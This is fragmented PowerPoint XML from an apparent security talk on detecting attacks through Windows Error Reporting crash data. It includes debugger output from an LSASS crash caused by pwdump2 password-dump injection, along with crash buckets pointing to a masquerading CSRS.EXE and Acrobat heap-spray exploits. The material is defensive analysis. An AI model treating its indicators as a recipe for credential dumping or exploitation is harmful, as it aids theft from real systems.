            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why did it crash?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36822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3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3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3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3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3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3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3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3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 fill="hold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3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2971801"/>
            <a:ext cx="7772400" cy="2797175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OOPS 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32847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MS07-029 DNS  0-day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4943"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="1219201"/>
            <a:ext cx="8763000" cy="410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25146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242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576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724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610100" y="3543300"/>
            <a:ext cx="1447800" cy="106680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038600" y="5181600"/>
            <a:ext cx="3124200" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92667"/>
              <a:gd name="adj2" fmla="val -62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what are these crashes (going back to 3/8)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3086894" y="4229100"/>
            <a:ext cx="1600200" cy="1588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886200" y="1524000"/>
            <a:ext cx="2895600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48992"/>
              <a:gd name="adj2" fmla="val 118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When we are notified of the issue (4/7)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038600" y="1447800"/>
            <a:ext cx="2895600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26953"/>
              <a:gd name="adj2" fmla="val 127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Exploits take off after advisory published (4/12)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524000" y="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Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0408312618.cab  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Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri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PROCESS_NAME: LSASS.EXE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Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri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0:019&gt; kb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ChildEBP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RetAddr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 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to Child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01109f64 7c90e9c0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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ntdll!KiFastSystemCallRet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01109f68 7c8025cb ntdll!ZwWaitForSingleObject+0xc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01109fcc 7c802532 kernel32!WaitForSingleObjectEx+0xa8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01109fe0 699e044d kernel32!WaitForSingleObject+0x12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0110a048 699d79d0 faultrep!MyCallNamedPipe+0x15b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0110e4a4 699d82f1 faultrep!StartManifestReport+0x1cd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0110f514 7c8633b1 faultrep!ReportFault+0x573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0110fbb4 7c83ab20 kernel32!UnhandledExceptionFilter+0x587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0110fbbc 7c839b09 kernel32!BaseThreadStart+0x4d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0110fbe4 7c9037bf kernel32!_except_handler3+0x61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0110fc08 7c90378b ntdll!ExecuteHandler2+0x26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0110fcb8 7c90eafa ntdll!ExecuteHandler+0x24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0110fcb8 00a10320 ntdll!KiUserExceptionDispatcher+0xe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WARNING: Frame IP not in any known module. Following frames may be wrong.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0110ffb4 7c80b683 0xa10320 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0110ffec 00000000 kernel32!BaseThreadStart+0x37   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023804" y="4648201"/>
            <a:ext cx="4958397" cy="1323439"/>
            <a:chOff x="3048000" y="762000"/>
            <a:chExt cx="4958397" cy="1323439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3914979" y="762000"/>
              <a:ext cx="409141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Code not in a loaded module</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Left Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048000" y="990600"/>
              <a:ext cx="838200" cy="3810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9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1524000" y="0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0:019&gt; u 00a10320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00a10320 53              push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ebx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00a10321 56              push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esi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00a10322 8b74240c    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mov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 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esi,dword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ptr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[esp+0Ch]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00a10326 57              push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edi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00a10327 83cbff          or      ebx,0FFFFFFFFh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00a1032a 8d460c          lea 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eax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,[esi+0Ch]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00a1032d 50              push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eax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00a1032e ff16            call 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dword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ptr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esi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]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Hmm what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params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were passed to it?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nsolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri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0:019&gt; dc 00a10000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00a10000  7c883f9c 7c883fec 7c80abde 445c3a43  .?.|.?.|...|C:\D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00a10010  4d55434f 5c317e00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="140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00000000 4f4c5c00  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OCUME~1\......\LO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00a10020  534c4143 545c317e 5c706d65 53726152  CALS~1\Temp\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RarS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00a10030  5c305846 75647770 5c32706d 446d6153  FX0\pwdump2\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SamD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00a10040  2e706d75 006c6c64 00000000 00000000  ump.dll.........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black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahom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0:019&gt; .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exr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 -1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ExceptionAddress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: 00a10320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   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ExceptionCode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: c0000005 (Access violation) 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   Parameter[0]: 00000008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   Parameter[1]: 00a10320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ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attempt to execute non-executable address 00a10320</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49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0:019&gt; !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vprot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  00a10320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BaseAddress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:       00a10000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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protect:           00000004  PAGE_READWRITE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8042778" y="2667001"/>
            <a:ext cx="2743200" cy="1323439"/>
            <a:chOff x="3048000" y="990600"/>
            <a:chExt cx="2743200" cy="1323439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462293" y="990600"/>
              <a:ext cx="232890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Password </a:t>
              </a:r>
            </a:p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dumper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3048000" y="1524000"/>
              <a:ext cx="533400" cy="3810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7239000" y="4495801"/>
            <a:ext cx="3387222" cy="1323439"/>
            <a:chOff x="3048000" y="990600"/>
            <a:chExt cx="3387222" cy="1323439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462293" y="990600"/>
              <a:ext cx="2972929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Memory not </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                  <a:ln w="1905"/>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="F79646">
                          <a:shade val="20000"/>
                          <a:satMod val="200000"/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="78000">
                        <a:srgbClr val="F79646">
                          <a:tint val="90000"/>
                          <a:shade val="89000"/>
                          <a:satMod val="220000"/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="F79646">
                          <a:tint val="12000"/>
                          <a:satMod val="255000"/>
                        </a:srgb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Calibri"/>
                </a:rPr>
                <a:t>executable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Left Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048000" y="1524000"/>
              <a:ext cx="533400" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="lef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0" y="62484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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PRIMARY_PROBLEM_CLASS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SWI_LSASS_Password_Dump_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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E5098-6EB0-4B48-B9D9-799E87D0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084363"/>
            <a:ext cx="11653523" cy="2356927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From Virus Bulletin 2018 Keynote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34764726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3685-953E-405D-A845-BDBA397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Error Reporting: Bucketing Level One</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 51" descr="XP icon user accounts">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CC8C04-0360-4758-8958-7E7665C8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493" y="1412044"/>
            <a:ext cx="383042" cy="31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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA847287-B8E1-4997-B90E-A3D31E5DBF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-233444" y="487"/>
            <a:ext cx="9412461" cy="112053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endParaRPr lang="en-US" sz="3529" spc="-1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/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 17" descr="PC with flat panel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8005A0-6D7E-4B74-BFB4-7808663B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407" y="1262640"/>
            <a:ext cx="450750" cy="532668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 14" descr="3-01545_attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD7ADC7-EB8D-429F-A0F5-0E01CD4F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8513" y="1412044"/>
            <a:ext cx="478948" cy="4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iped Right Arrow 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C308CF1-C71D-4551-90F0-CE6B5557E3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929640" y="1377160"/>
            <a:ext cx="3137487" cy="323709"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRight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1B30-DC1B-43C0-A0FB-25B2CBE76861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240365" y="4381393"/>
            <a:ext cx="8441334" cy="45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2353" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>GET http://watson.microsoft.com with the following URI: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60E5F86-C9DD-4D73-A549-06D13046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0301" y="2009661"/>
            <a:ext cx="4780932" cy="21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4" descr="3-01545_attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7049A437-239E-4CB7-9184-94E45354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640" y="3653106"/>
            <a:ext cx="448212" cy="42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Bent Arrow 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91517710-7215-428B-B7A9-88516F4E5326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7365935" y="3578404"/>
            <a:ext cx="2502519" cy="1344637"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16176"/>
              <a:gd name="adj2" fmla="val 23897"/>
              <a:gd name="adj3" fmla="val 25735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CB282-7AEF-451B-84ED-69D01018AECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8299711" y="1121018"/>
            <a:ext cx="1568743" cy="90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US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Windows Error Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 19" descr="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F1065A-3FC9-4222-B2E5-26CCA4DF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3962" y="1223040"/>
            <a:ext cx="493468" cy="75307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DA6B9-0579-46B9-B0D3-170B1F788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658" y="1252318"/>
            <a:ext cx="1008478" cy="6816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1E5B936-1CF6-4B7B-B96C-82D3E9923574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270795" y="4966812"/>
            <a:ext cx="12772497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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0" err="1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svchost_exe</a:t>
            </a:r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/5_1_2600_3264/470c3339/NETAPI32_dll/5_1_2600_3264/470c3339/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c0000005/</a:t>
            </a:r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00018ae1.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangular Callout 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DE8716-7985-43A0-AC0C-D79D8AECA92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008798" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5969"/>
              <a:gd name="adj2" fmla="val -867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Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangular Callout 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBF2AD5-9C5D-4154-B201-365100DC2CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295334" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5405"/>
              <a:gd name="adj2" fmla="val -950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Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangular Callout 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0383E4-4098-4D34-8362-DAA9331590AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581871" y="5625333"/>
            <a:ext cx="1157882" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12066"/>
              <a:gd name="adj2" fmla="val -927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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Timestamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1765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6" name="Rectangular Callout 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805C5F96-B5F9-4AC5-91CC-D556A3F048EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905758" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13056"/>
              <a:gd name="adj2" fmla="val -935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Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangular Callout 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9660C5B-E0CE-4FA4-9CAF-3967DE27EBCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192294" y="5625333"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 23611"/>
              <a:gd name="adj2" fmla="val -81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Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangular Callout 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{175B1C78-BED7-4437-804E-2AC37D3A4579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7478830" y="5633351"/>
            <a:ext cx="1157882" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50655"/>
              <a:gd name="adj2" fmla="val -893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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1568" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Timestamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1765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9" name="Rectangular Callout 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2EA75D-7397-43B8-A779-7E4155EF5C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802718" y="5633351"/>
            <a:ext cx="1212928" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43671"/>
              <a:gd name="adj2" fmla="val -958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Exception</a:t>
            </a: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001615D1-F936-4A98-AE1C-4983576C5985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10181653" y="5641133"/>
            <a:ext cx="1120531" cy="821723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24167"/>
              <a:gd name="adj2" fmla="val -863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Offset in Module of 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D1FC32-5EA1-4247-A061-BD5DF3B8E0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438811" y="2197601"/>
            <a:ext cx="5008690" cy="1378919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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="en-US" sz="2353" b="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Now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Scale: Billions of hits per month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Label: Solution exists to problem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No PII collected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54DFD-A4B3-4D70-A44C-BDB007C17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2" y="5500648"/>
            <a:ext cx="916402" cy="9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0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4C99-C168-4B6C-9B44-9DD1736F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Error Reporting: Labels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22684-276E-4DCD-981C-637B0EA2343F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115167" y="2219363"/>
            <a:ext cx="1161537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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>csrs_exe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/0_0_0_0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntdll_dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/5_1_2600_2180/0001888f.htm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F0078-E7D7-4367-892F-67407DE2E76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729739" y="2742276"/>
            <a:ext cx="9073188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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Malware: CSRS.EXE with no file-version masquerading as Windows binary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent Arrow 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5D7319-D0A8-415D-8585-9CAE603A690A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1609208" y="2592872"/>
            <a:ext cx="1045829" cy="39075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D2DDF6-74FE-491A-A9F2-8D78A7E849AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119835" y="4210480"/>
            <a:ext cx="11877629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/BEX/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acrobat_exe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7_0_8_218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/446abede/unknown/0_0_0_0/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0c0c0c0c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c0000005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/8.htm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8F3079-1B7B-44FF-A4A2-6A6BF524C270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809110" y="4733393"/>
            <a:ext cx="6947292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Segoe UI"/>
              </a:rPr>
              <a:t>Some Acrobat reader exploit against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>unpatched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Bent Arrow 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5944862E-DEE7-4BD5-8918-31C969CDB39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1688579" y="4583989"/>
            <a:ext cx="1045829" cy="4482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97B341-70D3-4644-A30F-654369BC6ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119836" y="5237574"/>
            <a:ext cx="11750774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/BEX/AcroRd32_exe/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&lt;full patch&gt;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/446abede/unknown/0_0_0_0/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0c0c0c0c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/c0000005/8.htm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0846C4-A909-45BC-89E1-E739081F5E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809110" y="5760488"/>
            <a:ext cx="5677357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Segoe UI"/>
              </a:rPr>
              <a:t>0-day </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Bent Arrow 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943E43DE-8BEB-4C7C-B1A1-0A08CFD247CF}"/>
              </a:ext>
            </a:extLst>
